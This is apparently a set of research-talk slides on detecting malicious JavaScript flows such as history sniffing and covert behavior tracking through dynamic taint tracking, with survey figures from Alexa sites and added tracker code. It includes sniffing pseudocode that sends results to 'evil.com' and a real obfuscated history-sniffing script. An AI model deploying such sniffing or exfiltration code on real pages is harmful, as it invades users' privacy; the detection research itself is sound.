Motivation: malicious flows in web pages

Location Hijacking (phishing): a malicious flow into document.location.
Cookie Stealing (identity theft): a malicious flow out of document.cookie.
History Sniffing: JavaScript tells visited links apart from not-visited ones.
Behavior Tracking: "See absolutely everything visitors do on your webpage. …"
Plenty of Mischief Possible!

How prevalent are malicious flows? How can malicious flows be detected?

Outline: Motivation, Flow Policies, Dynamic Flow Tracking, Flows in the Wild, Conclusions

Flow Policies: specify the different types of flows.
Policies: History Sniffing
1. Create an (invisible) link to a.com; its color depends on the browser history.
2. Inspect the link's color style property; the color says whether the link was visited.
3. Send the sniffed information over the network.

    link = createLink("facebook.com");
    style = doc.getStyle(link);
    visited = style.color == "purple";
    send("evil.com", "facebook=" + visited);

Inject taints at confidential sources: doc.getStyle(link) returns a tainted style.
Propagate taints at assignments, etc.: the taint flows from style into style.color == "purple", then into visited and into "facebook=" + visited.
Block taints at untrusted sinks: send("evil.com", "facebook=" + visited) is blocked because its second argument is tainted.
Flow Policies: Inject and Block

    at doc.getStyle($1) if isLink($1) inject "secret"
    (taint the returned style with "secret")

    at send($1, $2) block "secret" on $2
    (block tainted values sent to a third party)

General form of a policy:

    at Site if Cond inject Taint
    at Site block Taint on Param

Flow policies are expressive: history sniffing, behavior tracking, cookie stealing, location hijacking, …
Dynamic Flow Tracking
Rewrite JS code to carry taints: source code → Parse → AST → Rewrite AST → Execute. Dynamically generated code (eval) is rewritten when it is evaluated [Chander et al., POPL 07].
The rewritten code adds .taint fields to values and injects, propagates, and blocks taints.
Rewriting issues: boxing/unboxing of values, indirect flows, dynamic eval.
Implemented in Chrome/V8.
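The inject/propagate/block model of the policy slides, and the boxing and indirect-flow issues listed just above, as an added illustration. This is not the paper's V8 rewriter: it is a miniature interpreter-level tracker, and the helper names (Tainted, op, callSite, policies, doc, send), the sample browser history and the fake network log are all assumptions made for this example.

```javascript
// Added example (not the paper's V8 rewriter): a miniature "inject / propagate /
// block" taint tracker for the history-sniffing flow on the slides. Helper names,
// the one-entry browser history and the network log are constructed.

// Boxing: a value plus the set of taint labels attached to it.
class Tainted {
  constructor(value, labels = new Set()) {
    this.value = value;
    this.labels = labels;
  }
  static of(v) { return v instanceof Tainted ? v : new Tainted(v); }
}

function union(...sets) {
  const out = new Set();
  for (const s of sets) for (const l of s) out.add(l);
  return out;
}

// Propagate: an operation's result carries its operands' labels plus the labels
// of `pc`, the taints of the conditions currently guarding execution. The pc part
// is what turns an indirect flow (`if (secret) x = 1`) into a taint on x.
function op(pc, f, ...args) {
  const boxed = args.map(a => Tainted.of(a));
  return new Tainted(f(...boxed.map(b => b.value)),
                     union(pc, ...boxed.map(b => b.labels)));
}

// The two policies from the slides:
//   at doc.getStyle($1) if isLink($1) inject "secret"
//   at send($1, $2) block "secret" on $2
const policies = [
  { at: 'doc.getStyle', cond: ([link]) => link.value.isLink === true, inject: 'secret' },
  { at: 'send', block: 'secret', on: 1 },   // $2 is parameter index 1
];

// Instrumented call site: block policies inspect a parameter's labels before the
// call, inject policies add a label to the result after it.
function callSite(site, f, args, pc, violations) {
  const boxed = args.map(a => Tainted.of(a));
  for (const p of policies) {
    if (p.at === site && p.block !== undefined && boxed[p.on].labels.has(p.block)) {
      violations.push({ site, label: p.block, value: boxed[p.on].value });
      return new Tainted(undefined, union(pc));      // blocked: f never runs
    }
  }
  const result = op(pc, f, ...boxed);
  for (const p of policies) {
    if (p.at === site && p.inject !== undefined && p.cond(boxed)) result.labels.add(p.inject);
  }
  return result;
}

// Constructed browser model: one visited site, a fake DOM and a network log.
const visitedHistory = new Set(['facebook.com']);
const network = [];
const doc = {
  createLink: href => ({ isLink: true, href }),
  getStyle: link => ({ color: visitedHistory.has(link.href) ? 'purple' : 'blue' }),
};
const send = (host, payload) => { network.push({ host, payload }); return true; };

// The sniffing program from the slides, written against the instrumented API.
function runHistorySniff(target) {
  const pc = new Set(), violations = [];
  const link = callSite('doc.createLink', doc.createLink, [target], pc, violations);
  const style = callSite('doc.getStyle', doc.getStyle, [link], pc, violations);
  const visited = op(pc, s => s.color === 'purple', style);        // explicit flow
  const msg = op(pc, (a, b) => a + b, 'facebook=', visited);
  callSite('send', send, ['evil.com', msg], pc, violations);
  return { visited: visited.value, labels: [...visited.labels], violations };
}

// The same leak routed through a branch: the value assigned is a constant, so
// only the pc labels can carry the secret to the sink.
function runIndirectSniff(target) {
  const pc = new Set(), violations = [];
  const link = callSite('doc.createLink', doc.createLink, [target], pc, violations);
  const style = callSite('doc.getStyle', doc.getStyle, [link], pc, violations);
  const visited = op(pc, s => s.color === 'purple', style);
  const branchPc = union(pc, visited.labels);   // entering a branch on `visited`
  const flag = visited.value ? op(branchPc, () => 1) : op(branchPc, () => 0);
  callSite('send', send, ['evil.com', flag], pc, violations);
  return { flag: flag.value, labels: [...flag.labels], violations };
}

console.log(runHistorySniff('facebook.com'), runIndirectSniff('facebook.com'));
```

Both runs end with one recorded violation at send and an empty network log: the secret reaches the sink whether it travels through a comparison and a string concatenation or only through the branch condition, which is why the tracker has to box every value and carry a pc taint rather than instrument data operations alone.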
Dynamic Flow Tracking: Performance (Overhead)
Policies measured:
  Cookie Confidentiality: the cookie doesn't flow to 3rd-party code.
  Location Integrity: the location is unaffected by 3rd-party code.
Benchmark: the 10 sites with the largest JS code base in the Alexa top 100, 15–31 Kloc (avg. 21 Kloc).
Timing overheads: page load avg. 2x, JS execution avg. 3x.
Upshot: high for online use, acceptable for an offline survey.
Flows "In the Wild": History Sniffing, Behavior Tracking

History Sniffing: Figures
Alexa Top 50,000 sites: 63 sites reported as sending history over the network (1 site in the Alexa Top 100); 46 were real cases.

History Sniffing: Example (the 1 site in the Alexa Top 100)

    // Encrypted URLs (every character code shifted up by one)
    var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn", ...};
    var g = [];
    for (var m in k) {
      var d = k[m];
      // Decrypt URL
      var a = "";
      for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1)
      var h = false;
      for (var j in { "http://":"", "http://www.":""}) {
        // Create Link
        var l = document.createElement("a");
        l.href = j + a;
        document.getElementById("ol").appendChild(l);
        // Inspect Color
        var e = document.getComputedStyle(l).getPropertyValue("color")
        if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true }
      }
      if (h) { g.push(m) }
    }
History Sniffing: Real Cases

Rank  Site           Desc     Src          Inspected URLs
61    youporn        adult    youporn      pornhub, tube8, +21
867   charter.net    news     interclick   cars, edmunds, +46
2333  feedjit        traffic  feedjit      twitter, facebook, +6
2415  gamestorrents  game     meaningtool  amazon, ebay, +220
2811  newsmax        news     interclick   cars, edmunds, +46
3508  namepros       forum    feedjit      twitter, facebook, +6
3603  fulltono       music    meaningtool  amazon, ebay, +220
4266  youporngay     adult    youporngay   pornhub, tube8, +21
4581  osdir          tech     interclick   cars, edmunds, +46
5233  gamesfreak     game     interclick   cars, edmunds, +46
+ 36 more cases…

History Sniffing: Real Cases (figures)
Figure: charter.net, doubleclick.net, interclick.
Figure: gamestorrents, harrenmedianetwork, meaningtool.

History Sniffing: Upshot
Number of sniffed URLs: 8 to 222.
Of the 46 real cases, 39 had third-party sniffing code and 7 had home-grown code.
The sniffing code was obfuscated and generated at runtime.
Malicious Flows "In the Wild": History Sniffing, Behavior Tracking

Behavior Tracking
Log user behavior with JS event handlers, then send the log back to the website.

Behavior Tracking: Policy

    while (1) {
      e = getEvent();
      if (e.isMouseOver()) onMouseOver(e);
      if (e.isClick()) onClick(e);
      ...
    }
    onMouseOver = function(event) { isMouseOver = true; }

    at $1.isMouseOver() inject "secret"
    at $1.isClick() inject "secret"
    ...

The event checks such as e.isMouseOver() are the confidential sources. The handler's assignment isMouseOver = true depends on the tainted check only through the branch that invoked the handler, so the constant true must pick up the "secret" taint as an indirect flow.

Behavior Tracking: Figures
Alexa Top 1300 sites: 328 sites sent behavior; 115 sites sent behavior covertly.
10 sites sampled for manual inspection; 7 flows manually reconstructed.
Method: automatically trigger the JS event handlers. Many resulting flows are user-visible (image swapping); covert filter: response < 100 bytes.
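The two distinctions the survey slides rely on, third-party versus home-grown code for history sniffing and the covert filter (response < 100 bytes) for behavior tracking, as an added triage step over the reports a taint tracker would emit. This is not the study's own tooling: the record shape, the helper names (registrableDomain, isThirdParty, classify, summarize) and every sample record are constructed for this illustration.

```javascript
// Added example (not the study's own tooling): triage of flow reports emitted by
// a taint tracker, applying the slides' two filters. Record shape, helper names
// and all sample records are constructed.

// Constructed reports: one per blocked send. `script` is the host that served the
// code that reached the sink; `sink` is the host the data was sent to.
const sampleReports = [
  { site: 'www.news.example', script: 'cdn.adnet.example',     sink: 'adnet.example',         kind: 'history',  responseBytes: 0 },
  { site: 'forum.example',    script: 'forum.example',         sink: 'forum.example',         kind: 'history',  responseBytes: 0 },
  { site: 'shop.example',     script: 'shop.example',          sink: 'shop.example',          kind: 'behavior', responseBytes: 18234 }, // image swap
  { site: 'blog.example',     script: 'stats.tracker.example', sink: 'stats.tracker.example', kind: 'behavior', responseBytes: 43 },
  { site: 'blog.example',     script: 'blog.example',          sink: 'blog.example',          kind: 'behavior', responseBytes: 0 },
];

// Assumption: the registrable domain is the last two labels. That is wrong for
// suffixes such as co.uk; a real triage would consult the public suffix list.
function registrableDomain(host) {
  const labels = host.toLowerCase().split('.').filter(Boolean);
  return labels.slice(-2).join('.');
}

function isThirdParty(site, host) {
  return registrableDomain(site) !== registrableDomain(host);
}

function classify(r) {
  return {
    ...r,
    thirdPartyCode: isThirdParty(r.site, r.script),   // third-party vs. home-grown sniffing code
    crossOrigin: isThirdParty(r.site, r.sink),
    // Covert filter from the slides: a behavior send whose response is tiny
    // produced nothing the user could have seen (no image swap, no new content).
    covert: r.kind === 'behavior' && r.responseBytes < 100,
  };
}

// Counts in the shape of the slides' figures: sites, not individual sends.
function summarize(reports) {
  const rows = reports.map(classify);
  const sites = rs => new Set(rs.map(r => r.site)).size;
  const history = rows.filter(r => r.kind === 'history');
  const behavior = rows.filter(r => r.kind === 'behavior');
  return {
    historySites: sites(history),
    historyThirdParty: history.filter(r => r.thirdPartyCode).length,
    historyHomeGrown: history.filter(r => !r.thirdPartyCode).length,
    behaviorSites: sites(behavior),
    behaviorCovertSites: sites(behavior.filter(r => r.covert)),
  };
}

console.log(summarize(sampleReports));
```

The covert filter is deliberately a property of the response, not of the request: a send that is part of an image swap still carries tainted event data, but its large response shows the user had a visible reason for the request, so only the small-response sends are counted as covert tracking.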
Behavior Tracking: Real Cases
Figure: webtrends.com.

Conclusions
Flows occur in the wild: real cases for further study.
A dynamic approach is required: the code is obfuscated and dynamically generated.

Future work
Larger-scale study on flows: a deeper crawl and other types of flow.
Bullet-proof protection tool: policy enforcement without much slowdown and without many false alarms.

Thank you!